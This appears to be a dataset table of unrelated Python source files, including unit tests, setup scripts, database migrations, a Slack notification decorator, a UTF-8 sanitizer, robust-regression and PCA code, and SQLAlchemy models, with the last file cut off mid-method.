| content (stringlengths 0-894k) | type (stringclasses, 2 values) |
|---|---|
from mock import patch
from twisted.trial.unittest import TestCase
from apns.errorresponse import (
ErrorResponse,
ErrorResponseInvalidCodeError,
ErrorResponseInvalidCommandError
)
MODULE = 'apns.errorresponse.'
class ErrorResponseTestCase(TestCase):
CLASS = MODULE + 'ErrorResponse.'
def test_str(self):
resp = ErrorResponse()
resp.name = 'name'
self.assertEqual(str(resp), '<ErrorResponse: name>')
@patch(CLASS + 'CODES', {0: 'invalid token'})
@patch(MODULE + 'struct.unpack')
def test_properties_set(self, unpack_mock):
unpack_mock.return_value = ErrorResponse.COMMAND, 0, 'identifier'
resp = ErrorResponse()
resp.from_binary_string('stream')
self.assertEqual(resp.code, 0)
self.assertEqual(resp.name, 'invalid token')
self.assertEqual(resp.identifier, 'identifier')
@patch(MODULE + 'struct.unpack')
def test_from_binary_string_invalid_command(self, unpack_mock):
unpack_mock.return_value = ErrorResponse.COMMAND + 1, None, None
resp = ErrorResponse()
with self.assertRaises(ErrorResponseInvalidCommandError):
resp.from_binary_string('stream')
@patch(CLASS + 'CODES', {0: 'invalid token'})
@patch(MODULE + 'struct.unpack')
def test_from_binary_string_invalid_code(self, unpack_mock):
unpack_mock.return_value = ErrorResponse.COMMAND, 1, None
resp = ErrorResponse()
with self.assertRaises(ErrorResponseInvalidCodeError):
resp.from_binary_string('stream')
@patch(CLASS + 'CODES', {0: 'invalid token'})
def test_from_binary_string_valid_input(self):
resp = ErrorResponse()
resp.from_binary_string(resp.to_binary_string(0, 123))
self.assertEqual(resp.code, 0)
self.assertEqual(resp.name, 'invalid token')
self.assertEqual(resp.identifier, 123)
| python |
from typing import List
def warmUp(nums: List[int], target: int) -> List[int]:
numsDict = {}
for index, item in enumerate(nums):
diff = target - item
        if diff in numsDict:
            return [numsDict[diff], index]
        numsDict[item] = index
    return []  # explicit empty result when no pair sums to target
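# Hedged usage sketch (not part of the original module): the dict keeps each
# seen value's index, so the complement lookup is O(1) per element.
if __name__ == "__main__":
    assert list(warmUp([2, 7, 11, 15], 9)) == [0, 1]
    assert list(warmUp([3, 2, 4], 6)) == [1, 2]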
| python |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
with open('README.rst') as readme_file:
readme = readme_file.read()
requirements = [
'pika',
'twisted',
'checkoutmanager', # The 'collectors' branch of chintal's fork
# 'tendril', # Install this manually
]
test_requirements = [
# TODO: put package test requirements here
]
setup(
name='tendril-monitor-vcs',
version='0.1.0',
description="VCS monitoring and documentation generation server using "
"Twisted for Tendril",
long_description=readme,
author="Chintalagiri Shashank",
author_email='[email protected]',
url='https://github.com/chintal/tendril-monitor-vcs',
packages=[
'vcs_monitor',
],
package_dir={'vcs_monitor': 'vcs_monitor'},
include_package_data=True,
install_requires=requirements,
license="MIT",
zip_safe=False,
keywords='tendril-monitor-vcs',
classifiers=[
'Development Status :: 4 - Beta',
"License :: OSI Approved :: MIT License",
'Natural Language :: English',
'Programming Language :: Python',
],
test_suite='tests',
tests_require=test_requirements
)
| python |
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Add function to convert string to bucket
Revision ID: 4ec0adada10
Revises: 9177113533
Create Date: 2015-09-06 19:32:50.438462
"""
from alembic import op
revision = "4ec0adada10"
down_revision = "9177113533"
def upgrade():
op.execute(
"""
CREATE FUNCTION sitemap_bucket(text) RETURNS text AS $$
SELECT substring(
encode(digest($1, 'sha512'), 'hex')
from 1
for 1
)
$$
LANGUAGE SQL
IMMUTABLE
RETURNS NULL ON NULL INPUT;
"""
)
def downgrade():
op.execute("DROP FUNCTION sitemap_bucket(text)")
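# Illustrative note (not part of the migration): the SQL function above buckets
# a string by the first hex character of its SHA-512 digest, i.e. into one of
# sixteen buckets. A rough Python equivalent, assuming hashlib, would be:
#
#     import hashlib
#     def sitemap_bucket(text):
#         return hashlib.sha512(text.encode("utf-8")).hexdigest()[:1]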
| python |
from fastapi import APIRouter, Depends
from kairon.api.auth import Authentication
from kairon.api.processor import AccountProcessor
from kairon.api.models import Response, User
router = APIRouter()
auth = Authentication()
@router.get("/details", response_model=Response)
async def get_users_details(current_user: User = Depends(auth.get_current_user)):
"""
returns the details of the current logged-in user
"""
return {
"data": {"user": AccountProcessor.get_complete_user_details(current_user.email)}
}
| python |
import time
from slacker import Slacker
from script.util.BaseFSM import BaseFSM
from script.util.misc_util import error_trace
class SlackBotFsm(BaseFSM):
def __init__(self):
super().__init__()
self.add_state('pending', initial_state=True)
self.add_state('on going')
self.add_state('finish')
self.add_state('error')
self.add_event('raise_error', 'pending', 'error')
self.add_event('start', 'pending', 'on going')
self.add_event('raise_error', 'on going', 'error')
self.add_event('finish', 'on going', 'finish')
self.add_event('raise_error', 'finish', 'error')
    def start(self):
        # NOTE: as written this calls itself and recurses forever; the intent
        # appears to be firing the 'start' event registered above (the exact
        # dispatch method depends on BaseFSM's API, which is not shown here).
        self.start()
    def raise_error(self):
        # NOTE: same recursion issue; should fire the 'raise_error' event.
        self.raise_error()
    def finish(self):
        # NOTE: same recursion issue; should fire the 'finish' event.
        self.finish()
def test_slack_bot_fsm():
fsm = SlackBotFsm()
print(fsm.state)
fsm.start()
print(fsm.state)
fsm.raise_error()
print(fsm.state)
fsm.finish()
print(fsm.state)
class SlackBot:
def __init__(self, token_path=None, channel=None):
self.token_path = token_path
self.channel = channel
self.slacker = Slacker(self._get_token(self.token_path))
    def _get_token(self, token_path):
        with open(token_path, 'r') as f:
            # read() rather than readlines(), so a single token string is returned
            token = f.read().strip()
        return token
def post_message(self, msg, attachments=None):
# TODO to make usable
if attachments:
attachments_dict = dict()
            attachments_dict['pretext'] = "pretext: text shown before the attachments block"
            attachments_dict['title'] = "title: shown larger and bolder than the other text"
            attachments_dict['title_link'] = "https://corikachu.github.io"
            attachments_dict['fallback'] = "text shown in client notifications; it does not appear in the attachment block"
            attachments_dict['text'] = "body text! collapses behind *show more* past 5 lines."
            attachments_dict['mrkdwn_in'] = ["text", "pretext"]  # fields to which markdown formatting is applied
attachments = [attachments_dict]
self.slacker.chat.post_message(channel=self.channel, text='tetsetseetsetset', attachments=attachments)
else:
self.slacker.chat.post_message(self.channel, msg)
def test_SlackBot():
bot = SlackBot()
bot.post_message('hello world')
def deco_slackbot(token_path, channel):
def _deco_slack_bot(func):
def wrapper(*args, **kwargs):
start = time.time()
try:
ret = func(*args, **kwargs)
except BaseException as e:
print(error_trace(e))
ret = None
elapse_time = time.time() - start
try:
bot = SlackBot(token_path, channel)
msg = f"in {func.__name__}(), time {elapse_time:.4f}'s elapsed"
bot.post_message(msg)
except BaseException as e:
print(error_trace(e))
print('slackbot fail to post message')
return ret
wrapper.__name__ = func.__name__
return wrapper
return _deco_slack_bot
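# Hedged usage sketch (token path and channel are placeholders, not from the
# source): the decorator times the wrapped call and posts the elapsed time to
# Slack, printing a trace instead of raising if either step fails.
#
#     @deco_slackbot('./slack_token.txt', '#experiments')
#     def train_model():
#         ...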
| python |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# rom.py
#
# Part of MARK II project. For informations about license, please
# see file /LICENSE .
#
# author: Vladislav Mlejnecký
# email: [email protected]
from memitem import memitem
import sys
import mif
class rom(memitem):
def __init__(self, baseAddress, size, rom0mif, name):
memitem.__init__(self, baseAddress, size, name)
self.loadmif(rom0mif)
def loadmif(self, fileName):
miffile = mif.mif(mif.READ, fileName)
if miffile.read() == mif.OK:
for item in miffile.outBuff:
self.mem[item.address] = item.value
else:
            # NOTE: instances have no __name__ attribute; memitem is assumed to
            # store the constructor's ``name`` argument as self.name.
            print "Error in " + self.name + "! Can't read input file <" + fileName + ">!"
            print miffile.errmsg
sys.exit(1)
| python |
#! /usr/bin/env python
# -*- coding:utf-8; mode:python -*-
from ilcli import Command
class FirstDemoCommand(Command):
ignore_arguments = ['-b']
def _init_arguments(self):
super()._init_arguments()
self.add_argument('--foo')
class SecondDemoCommand(FirstDemoCommand):
ignore_arguments = ['--bar', '--foo']
class ThirdDemoCommand(FirstDemoCommand):
ignore_arguments = ['bat']
class Parent(Command):
subcommands = [FirstDemoCommand, SecondDemoCommand, ThirdDemoCommand]
def _init_arguments(self):
self.add_argument('-b', '--bar')
self.add_argument('bat')
if __name__ == '__main__':
exit(Parent().run())
| python |
r"""UTF-8 sanitizer.
Python's UTF-8 parser is quite relaxed; this creates problems when
talking with other software that uses stricter parsers.
>>> _norm(safe_utf8_decode(b"foobar"))
(True, ['f', 'o', 'o', 'b', 'a', 'r'])
>>> _norm(safe_utf8_decode(b'X\0Z'))
(False, ['X', 65533, 'Z'])
>>> _norm(safe_utf8_decode(b'OK'))
(True, ['O', 'K'])
>>> _norm(safe_utf8_decode(b'X\xF1Y'))
(False, ['X', 65533, 'Y'])
>>> _norm_str(sanitize_unicode(u'\uD801\uDC01'))
[66561]
>>> sanitize_unicode(b'qwe')
Traceback (most recent call last):
...
TypeError: Need unicode string
"""
## these give different results in py27 and py35
# >>> _norm(safe_utf8_decode(b'X\xed\xa0\x80Y\xed\xb0\x89Z'))
# (False, ['X', 65533, 65533, 65533, 'Y', 65533, 65533, 65533, 'Z'])
# >>> _norm(safe_utf8_decode(b'X\xed\xa0\x80\xed\xb0\x89Z'))
# (False, ['X', 65533, 65533, 65533, 65533, 65533, 65533, 'Z'])
# from __future__ import division, absolute_import, print_function
import re
import codecs
try:
unichr
except NameError:
unichr = chr # noqa
unicode = str # noqa
def _norm_char(uchr):
code = ord(uchr)
if code >= 0x20 and code < 0x7f:
return chr(code)
return code
def _norm_str(ustr):
return [_norm_char(c) for c in ustr]
def _norm(tup):
flg, ustr = tup
return (flg, _norm_str(ustr))
__all__ = ['safe_utf8_decode']
# by default, use same symbol as 'replace'
REPLACEMENT_SYMBOL = unichr(0xFFFD) # 65533
def _fix_utf8(m):
"""Merge UTF16 surrogates, replace others"""
u = m.group()
if len(u) == 2:
# merge into single symbol
c1 = ord(u[0])
c2 = ord(u[1])
c = 0x10000 + ((c1 & 0x3FF) << 10) + (c2 & 0x3FF)
return unichr(c)
else:
# use replacement symbol
return REPLACEMENT_SYMBOL
_urc = None
def sanitize_unicode(u):
"""Fix invalid symbols in unicode string."""
global _urc
if not isinstance(u, unicode):
raise TypeError('Need unicode string')
# regex for finding invalid chars, works on unicode string
if not _urc:
rx = u"[\uD800-\uDBFF] [\uDC00-\uDFFF]? | [\0\uDC00-\uDFFF]"
_urc = re.compile(rx, re.X)
# now find and fix UTF16 surrogates
m = _urc.search(u)
if m:
u = _urc.sub(_fix_utf8, u)
return u
def safe_replace(exc):
"""Replace only one symbol at a time.
Builtin .decode('xxx', 'replace') replaces several symbols
together, which is unsafe.
"""
c2 = REPLACEMENT_SYMBOL
# we could assume latin1
#if 0:
# c1 = exc.object[exc.start]
# c2 = unichr(ord(c1))
return c2, exc.start + 1
# register, it will be globally available
codecs.register_error("safe_replace", safe_replace)
def safe_utf8_decode(s):
"""Decode UTF-8 safely.
Acts like str.decode('utf8', 'replace') but also fixes
UTF16 surrogates and NUL bytes, which Python's default
decoder does not do.
@param s: utf8-encoded byte string
@return: tuple of (was_valid_utf8, unicode_string)
"""
# decode with error detection
ok = True
try:
# expect no errors by default
u = s.decode('utf8')
except UnicodeDecodeError:
u = s.decode('utf8', 'safe_replace')
ok = False
u2 = sanitize_unicode(u)
if u is not u2:
ok = False
return (ok, u2)
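# Minimal usage sketch (not part of the original module), consistent with the
# doctests above: the first element reports whether the input was valid UTF-8.
if __name__ == "__main__":
    ok, text = safe_utf8_decode(b"X\xf1Y")
    assert ok is False and text == u"X\ufffdY"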
| python |
#! /usr/local/bin/python3
import operator
import sys
from collections import deque
from math import prod
pubKeys = [int(x) for x in sys.stdin.read().split("\n")[:2]]
subject = [1 for i in pubKeys]
print(pubKeys)
handDivisor = 20201227
acc = [0 for i in pubKeys]
for i, k in enumerate(pubKeys):
while k != subject[i]:
acc[i] += 1
subject[i] = (subject[i] * 7) % handDivisor
print(acc)
print(pow(pubKeys[0], acc[1], handDivisor), pow(pubKeys[1], acc[0], handDivisor))
| python |
import sys
import os
sys.path.append(os.path.join('..','utils'))
import numpy as np
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
from utilsRobust import *
######################
### VARIOUS TESTS FOR UTILS ROBUST
######################
def test_mestimate():
mean = 0
std = 5
x = np.arange(1000)
y = np.random.normal(mean, std, x.size)
ones = np.ones(shape=(x.size))
    # add large outliers
    numOutliers = 450
    for i in xrange(0, numOutliers):
index = np.random.randint(0, x.size)
y[index] = np.random.randint(std*4, std*20)
# compute mean
mean = np.average(y)
standardDev = np.std(y)
# compute mad
med = sampleMedian(y)
mad = sampleMAD(y)
# mestimates
mestLocation, mestScale = mestimate(y)
# plot
plt.figure()
plt.scatter(x, y, color='y')
plt.plot(x, ones*mean, lw = 2, color="b", label="mean")
plt.plot(x, ones*standardDev, lw = 2, color="b", ls="dashed")
plt.plot(x, ones*med, lw = 2, color="g", label="median")
plt.plot(x, ones*mad, lw = 2, color="g", ls="dashed")
plt.plot(x, ones*mestLocation, lw = 2, color="r", label="mest")
plt.plot(x, ones*mestScale, lw = 2, color="r", ls="dashed")
plt.legend()
plt.show()
def test_mestimateModel():
# let's generate some data
x = np.arange(1000)
y = np.arange(-50, 50, 0.1)
# create a linear function of this
z = 2.5*x + y
# let's add some noise
mean = 0
std = 3
noise = np.random.normal(0, 3, x.size)
# print noise.shape
z = z + noise
# now add some outliers
numOutliers = 80
for i in xrange(0, numOutliers):
index = np.random.randint(0, x.size)
z[index] = np.random.randint(std*4, std*20)
A = np.transpose(np.vstack((x, y)))
# now try and do a robust regression
components = mestimateModel(A, z)
print components
# plt.figure()
# plt.plot()
def testRobustRegression():
# random seed
np.random.seed(0)
# the function
x = np.arange(150)
y = 12 + 0.5*x
# noise
mean = 0
std = 3
noise = np.random.normal(mean, 3*std, x.size)
# add noise
yNoise = y + noise
# now add some outliers
numOutliers = 30
for i in xrange(0, numOutliers):
index = np.random.randint(0, x.size)
yNoise[index] = yNoise[index] + np.random.randint(-1000, 1000)
# now add some outliers
xNoise = np.array(x)
numOutliers = 30
for i in xrange(0, numOutliers):
index = np.random.randint(0, x.size)
xNoise[index] = x[index] + np.random.randint(-5000, 5000)
xNoise = xNoise.reshape((x.size,1))
# lets use m estimate
paramsM, residsM, scaleM, weightsM = mestimateModel(xNoise, yNoise, intercept=True)
# lets use mm estimate
paramsMM, residsMM, scaleMM, weightsMM = mmestimateModel(xNoise, yNoise, intercept=True)
# lets test chatterjee machler
paramsCM, residsCM, weightsCM = chatterjeeMachler(xNoise, yNoise, intercept=True)
# lets test chatterjee machler mod
paramsModCM, residsModCM, weightsModCM = chatterjeeMachlerMod(xNoise, yNoise, intercept=True)
    # let's plot Pdiag (disabled: Pdiag is not defined in this scope)
    # plt.figure()
    # n, bins, patches = plt.hist(Pdiag, 50, normed=0, facecolor='green', alpha=0.75)
# try and predict
yM = paramsM[0] + paramsM[1]*x
yMM = paramsMM[0] + paramsMM[1]*x
yCM = paramsCM[0] + paramsCM[1]*x
yCM_mod = paramsModCM[0] + paramsModCM[1]*x
plt.figure()
plt.scatter(x, y, marker="s", color="black")
plt.scatter(xNoise, yNoise)
plt.plot(x, yM)
plt.plot(x, yMM)
plt.plot(x, yCM)
plt.plot(x, yCM_mod)
plt.legend(["M estimate", "MM estimate", "chatterjeeMachler", "chatterjeeMachlerMod"], loc="lower left")
plt.show()
def testRobustRegression2D():
# random seed
np.random.seed(0)
numPts = 300
# the function
x1 = np.arange(numPts, dtype="float")
x2 = 10*np.cos(2.0*np.pi*10*x1/np.max(x1))
y = 12 + 0.5*x1 + 3*x2
# noise
mean = 0
std = 3
noise = np.random.normal(mean, 3*std, numPts)
# add noise
yNoise = y + noise
# now add some outliers
numOutliers = 140
for i in xrange(0, numOutliers):
index = np.random.randint(0, numPts)
yNoise[index] = yNoise[index] + np.random.randint(-100, 100)
# now add some outliers
x1Noise = np.array(x1)
x2Noise = np.array(x2)
numOutliers = 5
for i in xrange(0, numOutliers):
index = np.random.randint(0, numPts)
x1Noise[index] = x1[index] + np.random.randint(-500, 500)
index = np.random.randint(0, numPts)
x2Noise[index] = x2[index] + np.random.randint(-500, 500)
x1Noise = x1Noise.reshape((x1.size,1))
x2Noise = x2Noise.reshape((x2.size,1))
X = np.hstack((x1Noise, x2Noise))
# lets use m estimate
paramsM, residsM, scaleM, weightsM = mestimateModel(X, yNoise, intercept=True)
# lets use mm estimate
paramsMM, residsMM, scaleMM, weightsMM = mmestimateModel(X, yNoise, intercept=True)
# lets test chatterjee machler
paramsCM, residsCM, weightsCM = chatterjeeMachler(X, yNoise, intercept=True)
# lets test chatterjee machler mod
paramsModCM, residsModCM, weightsModCM = chatterjeeMachlerMod(X, yNoise, intercept=True)
# lets test chatterjee machler hadi
paramsCMHadi, residsCMHadi, weightsCMHadi = chatterjeeMachlerHadi(X, yNoise, intercept=True)
# try and predict
yM = paramsM[0] + paramsM[1]*x1 + paramsM[2]*x2
yMM = paramsMM[0] + paramsMM[1]*x1 + paramsMM[2]*x2
yCM = paramsCM[0] + paramsCM[1]*x1 + paramsCM[2]*x2
yCM_mod = paramsModCM[0] + paramsModCM[1]*x1 + paramsModCM[2]*x2
yCM_Hadi = paramsCMHadi[0] + paramsCMHadi[1]*x1 + paramsCMHadi[2]*x2
fig = plt.figure()
ax = fig.add_subplot(111, projection='3d')
ax.scatter(x1, x2, y, marker="s", color="black")
ax.scatter(x1Noise, x2Noise, yNoise, marker="*", s=50, color="goldenrod")
# plt.plot(x1, x2, zs=yM)
plt.plot(x1, x2, zs=yMM)
# plt.plot(x1, x2, zs=yCM)
plt.plot(x1, x2, zs=yCM_mod)
# plt.plot(x1, x2, zs=yCM_Hadi)
# plt.legend(["M estimate", "MM estimate", "chatterjeeMachler", "chatterjeeMachlerMod", "chatterjeeMachlerHadi"], loc="lower left")
plt.legend(["MM estimate", "chatterjeeMachlerMod"], loc="lower left")
plt.show()
#test_mestimate()
# test_mestimateModel()
# testRobustRegression()
testRobustRegression2D()
| python |
import numpy as np
from scratch.abstract import AbstractModel
class PCA(AbstractModel):
def __init__(self):
pass
@staticmethod
def normalizing(v):
return (v - np.mean(v)) / np.std(v)
def fit(self, X):
# step 1: normalizing
Xarray = X.to_numpy()
self.Xscale = np.apply_along_axis(self.normalizing, 0, Xarray)
# step 2: compute covariances
Xcov = np.cov(self.Xscale.T)
# step 3: compute eigenvalues and eigenvectors
eigenvalues, eigenvectors = np.linalg.eig(Xcov)
eigenvectors = eigenvectors.T
# step 4: construct feature vector
idx = np.flip(np.argsort(eigenvalues))
self.eigenvalues = eigenvalues[idx]
self.eigenvectors = eigenvectors[idx]
def predict(self):
return np.dot(self.Xscale, self.eigenvectors.T)
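# Hedged usage sketch (assumes a pandas DataFrame input, since fit() calls
# X.to_numpy()): fit() standardizes the columns, and predict() projects the
# standardized data onto the eigenvectors sorted by descending eigenvalue.
#
#     import pandas as pd
#     df = pd.DataFrame(np.random.rand(100, 3), columns=list("abc"))
#     model = PCA()
#     model.fit(df)
#     scores = model.predict()   # shape (100, 3)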
| python |
from django.db import models
class Like(models.Model):
    uid = models.IntegerField()
    # max_length is required by CharField; 255 here is an assumed placeholder
    name = models.CharField(max_length=255)
# Create your models here.
| python |
import numpy as np
import pytest
import tensorflow as tf
from tensorflow.keras.layers import Dense, Input, InputLayer
from alibi_detect.cd.preprocess import UAE, HiddenOutput, pca
n, n_features, n_classes, latent_dim, n_hidden = 100, 10, 5, 2, 7
shape = (n_features,)
X = np.random.rand(n * n_features).reshape(n, n_features).astype('float32')
encoder_net = tf.keras.Sequential(
[
InputLayer(input_shape=(n_features,)),
Dense(latent_dim)
]
)
tests_uae = [encoder_net, latent_dim]
n_tests_uae = len(tests_uae)
@pytest.fixture
def uae_params(request):
return tests_uae[request.param]
@pytest.mark.parametrize('uae_params', list(range(n_tests_uae)), indirect=True)
def test_uae(uae_params):
enc = uae_params
if isinstance(enc, tf.keras.Sequential):
encoder_net, enc_dim = enc, None
elif isinstance(enc, int):
encoder_net, enc_dim = None, enc
X_enc = UAE(encoder_net=encoder_net, shape=X.shape[1:], enc_dim=enc_dim)(X)
assert X_enc.shape == (n, latent_dim)
class Model1(tf.keras.Model):
def __init__(self):
super(Model1, self).__init__()
self.dense1 = Dense(n_hidden)
self.dense2 = Dense(n_classes, activation='softmax')
def call(self, x: np.ndarray) -> tf.Tensor:
x = self.dense1(x)
return self.dense2(x)
def model2():
x_in = Input(shape=shape)
x = Dense(n_hidden)(x_in)
x_out = Dense(n_classes, activation='softmax')(x)
return tf.keras.models.Model(inputs=x_in, outputs=x_out)
tests_hidden_output = [
(1, -2, shape),
(1, -1, shape),
(2, -2, None),
(2, -1, None),
(2, -1, shape)
]
n_tests_hidden_output = len(tests_hidden_output)
@pytest.fixture
def hidden_output_params(request):
return tests_hidden_output[request.param]
@pytest.mark.parametrize('hidden_output_params', list(range(n_tests_hidden_output)), indirect=True)
def test_hidden_output(hidden_output_params):
model, layer, input_shape = hidden_output_params
model = Model1() if model == 1 else model2()
X_hidden = HiddenOutput(model=model, layer=layer, input_shape=input_shape)(X)
if layer == -2:
assert X_hidden.shape == (n, n_hidden)
elif layer == -1:
assert X_hidden.shape == (n, n_classes)
tests_pca = [2, 4]
n_tests_pca = len(tests_pca)
@pytest.fixture
def pca_params(request):
return tests_pca[request.param]
@pytest.mark.parametrize('pca_params', list(range(n_tests_pca)), indirect=True)
def test_pca(pca_params):
n_components = pca_params
X_pca = pca(X, n_components)
assert X_pca.shape[-1] == n_components
| python |
# Generated by Django 2.1.3 on 2019-02-27 15:31
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('queueapp', '0007_auto_20190220_1642'),
]
operations = [
migrations.AddField(
model_name='queue',
name='pause_and_clear',
field=models.BooleanField(default=False),
),
]
| python |
import os
import re
import sys
import unittest
from line import *
from canonicalLine import *
from degenerateLine import *
from lineClassifier import *
import importlib
# pd, etree, Doc, and indent are expected to come from the wildcard imports above
pd.set_option('display.width', 1000)
filename = "../testData/daylight_1_4.eaf"
xmlDoc = etree.parse(filename)
lineCount = len(xmlDoc.findall("TIER/ANNOTATION/ALIGNABLE_ANNOTATION"))
assert(lineCount == 4)
htmlDoc = Doc()
htmlDoc.asis('<!DOCTYPE html>')
with htmlDoc.tag('html', lang="en"):
with htmlDoc.tag('head'):
htmlDoc.asis('<meta charset="UTF-8">')
htmlDoc.asis('<link rel="stylesheet" href="ijal.css">')
with htmlDoc.tag('body'):
for i in range(lineCount):
x = Line(xmlDoc, i)
with htmlDoc.tag("div", klass="line-wrapper"):
with htmlDoc.tag("div", klass="line-sidebar"):
htmlDoc.text("%d)" % (i + 1))
htmlDoc.asis('<img src="https://www.americanlinguistics.org/wp-content/uploads/speaker.png"></img>')
classifier = LineClassifier(x.getTable())
classification = classifier.run()
print("%d: %s" % (i, classification))
if(classification == "CanonicalLine"):
xc = CanonicalLine(xmlDoc, i)
xc.toHtml(htmlDoc)
elif(classification == "DegenerateLine"):
xd = DegenerateLine(xmlDoc, i)
xd.toHtml(htmlDoc)
htmlDoc.asis("<p><hr><p>")
htmlText = htmlDoc.getvalue()
filename = "daylight.html"
f = open(filename, "w")
f.write(indent(htmlText))
f.close()
os.system("open %s" % filename)
| python |
# pylint:disable=missing-module-docstring,missing-class-docstring,missing-function-docstring
from .base import compare_template, SimpleTestCase
class CopyButtonTest(SimpleTestCase):
maxDiff = None
def test_rendered(self):
template = """
{% load carbondesign %}
{% CopyButton %}
"""
expected = """
<button data-copy-btn class="bx--copy-btn" type="button" tabindex="0">
<span class="bx--assistive-text bx--copy-btn__feedback">Copied!</span>
<svg focusable="false" preserveAspectRatio="xMidYMid meet"
xmlns="http://www.w3.org/2000/svg" fill="currentColor"
class="bx--snippet__icon" width="16" height="16" viewBox="0 0 32 32"
aria-hidden="true">
<path d="M28,10V28H10V10H28m0-2H10a2,2,0,0,0-2,2V28a2,2,0,0,0,2,2H28a2,2,0,0,0,2-2V10a2,2,0,0,0-2-2Z"></path>
<path d="M4,18H2V4A2,2,0,0,1,4,2H18V4H4Z"></path>
</svg>
</button>
"""
rendered = compare_template(template, expected)
self.assertEqual(*rendered)
| python |
# These should probably all live in separate files
from ..tensorboard_writer import TensorboardWriter
from allennlp.training.callbacks.events import Events
from allennlp.training.callbacks.callback import Callback, handle_event
from allennlp.common.params import Params
import logging
from typing import Set, Dict, TYPE_CHECKING
if TYPE_CHECKING:
from allennlp.training.callback_trainer import CallbackTrainer
logger = logging.getLogger(__name__)
@Callback.register('tensorboard_logging')
class TensorboardLogger(Callback):
def __init__(self, tensorboard: TensorboardWriter):
self.tensorboard = tensorboard
@handle_event(Events.TRAINING_START)
def training_start(self, trainer: "CallbackTrainer") -> None:
# This is an ugly hack to get the tensorboard instance to know about the trainer, because
# the callbacks are defined before the trainer.
self.tensorboard._get_batch_num_total = lambda: trainer.batch_num_total
@handle_event(Events.BATCH_END)
def batch_end_logging(self, trainer: "CallbackTrainer"):
if self.tensorboard.should_log_this_batch():
self.tensorboard.log_histograms(trainer.model)
self.tensorboard.log_scalars(trainer.model)
@classmethod
def from_params( # type: ignore
cls, serialization_dir: str,
params: Params) -> "TensorboardLogger":
tensorboard = TensorboardWriter.from_params(
params=params,
serialization_dir=serialization_dir,
get_batch_num_total=lambda: None)
return cls(tensorboard)
| python |
from datetime import datetime
from decimal import Decimal
import calendar
from enum import IntEnum
import timex
from sqlalchemy import event
from sqlalchemy import and_, or_
from sqlalchemy import literal_column
from sqlalchemy import Column, Table, ForeignKey, Index, UniqueConstraint
from sqlalchemy import Float, Boolean, Text, DateTime, Integer, String
from sqlalchemy import cast, null, case
from sqlalchemy.orm.interfaces import PropComparator
from sqlalchemy.ext.hybrid import hybrid_property
from sqlalchemy.dialects.mysql import DECIMAL
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.ext.associationproxy import association_proxy
from sqlalchemy.orm import composite
from sqlalchemy.orm import backref
from sqlalchemy.orm import relationship
from sqlalchemy.orm.collections import attribute_mapped_collection
from sqlalchemy.types import TypeDecorator, DATETIME
class Datatype(IntEnum):
none = 0
string = 1
int = 2
float = 3
datetime = 4
timerange = 5
class StreamState(IntEnum):
active = 1
firing = 2
expiring = 3
error = 4
expire_error = 5
completed = 6
retry_fire = 7
retry_expire = 8
class DBException(Exception):
pass
class InvalidTraitType(DBException):
pass
def dt_to_decimal(dt):
t_sec = calendar.timegm(dt.utctimetuple()) + (dt.microsecond/1e6)
return Decimal("%.6f" % t_sec)
def decimal_to_dt(decimal_timestamp):
return datetime.utcfromtimestamp(float(decimal_timestamp))
class PreciseTimestamp(TypeDecorator):
"""Represents a timestamp precise to the microsecond."""
impl = DATETIME
def load_dialect_impl(self, dialect):
if dialect.name == 'mysql':
return dialect.type_descriptor(DECIMAL(precision=20,
scale=6,
asdecimal=True))
return dialect.type_descriptor(DATETIME())
def process_bind_param(self, value, dialect):
if value is None:
return value
elif dialect.name == 'mysql':
return dt_to_decimal(value)
return value
def process_result_value(self, value, dialect):
if value is None:
return value
elif dialect.name == 'mysql':
return decimal_to_dt(value)
return value
class DBTimeRange(object):
def __init__(self, begin, end):
self.begin = begin
self.end = end
def __composite_values__(self):
return self.begin, self.end
def __repr__(self):
return "DBTimeRange(begin=%r, end=%r)" % (self.begin, self.end)
def __eq__(self, other):
return isinstance(other, DBTimeRange) and \
other.begin == self.begin and \
other.end == self.end
def __ne__(self, other):
return not self.__eq__(other)
class ProxiedDictMixin(object):
"""Adds obj[name] access to a mapped class.
This class basically proxies dictionary access to an attribute
called ``_proxied``. The class which inherits this class
should have an attribute called ``_proxied`` which points to a dictionary.
"""
def __len__(self):
return len(self._proxied)
def __iter__(self):
return iter(self._proxied)
def __getitem__(self, name):
return self._proxied[name]
def __contains__(self, name):
return name in self._proxied
def __setitem__(self, name, value):
self._proxied[name] = value
def __delitem__(self, name):
del self._proxied[name]
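# Illustrative sketch (not from the source): a mapped class that mixes this in
# exposes its ``_proxied`` dictionary through item access, e.g.
#
#     stream["instance_id"] = "abc123"   # writes into stream._proxied
#     "instance_id" in stream            # True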
class PolymorphicVerticalProperty(object):
"""A name/value pair with polymorphic value storage."""
ATTRIBUTE_MAP = {Datatype.none: None}
PY_TYPE_MAP = {unicode: Datatype.string,
int: Datatype.int,
float: Datatype.float,
datetime: Datatype.datetime,
DBTimeRange: Datatype.timerange}
def __init__(self, name, value=None):
self.name = name
self.value = value
@classmethod
def get_type_value(cls, value):
if value is None:
return Datatype.none, None
if isinstance(value, str):
value = value.decode('utf8', 'ignore')
if isinstance(value, timex.Timestamp):
value = value.timestamp
if isinstance(value, timex.TimeRange):
value = DBTimeRange(value.begin, value.end)
if type(value) in cls.PY_TYPE_MAP:
return cls.PY_TYPE_MAP[type(value)], value
return None, value
@hybrid_property
def value(self):
if self.type not in self.ATTRIBUTE_MAP:
raise InvalidTraitType("Invalid trait type in db for %s: %s" % (self.name, self.type))
attribute = self.ATTRIBUTE_MAP[self.type]
if attribute is None:
return None
if self.type == Datatype.timerange:
val = getattr(self, attribute)
return timex.TimeRange(val.begin, val.end)
else:
return getattr(self, attribute)
@value.setter
def value(self, value):
datatype, value = self.get_type_value(value)
if datatype not in self.ATTRIBUTE_MAP:
raise InvalidTraitType("Invalid trait type for %s: %s" % (self.name, datatype))
attribute = self.ATTRIBUTE_MAP[datatype]
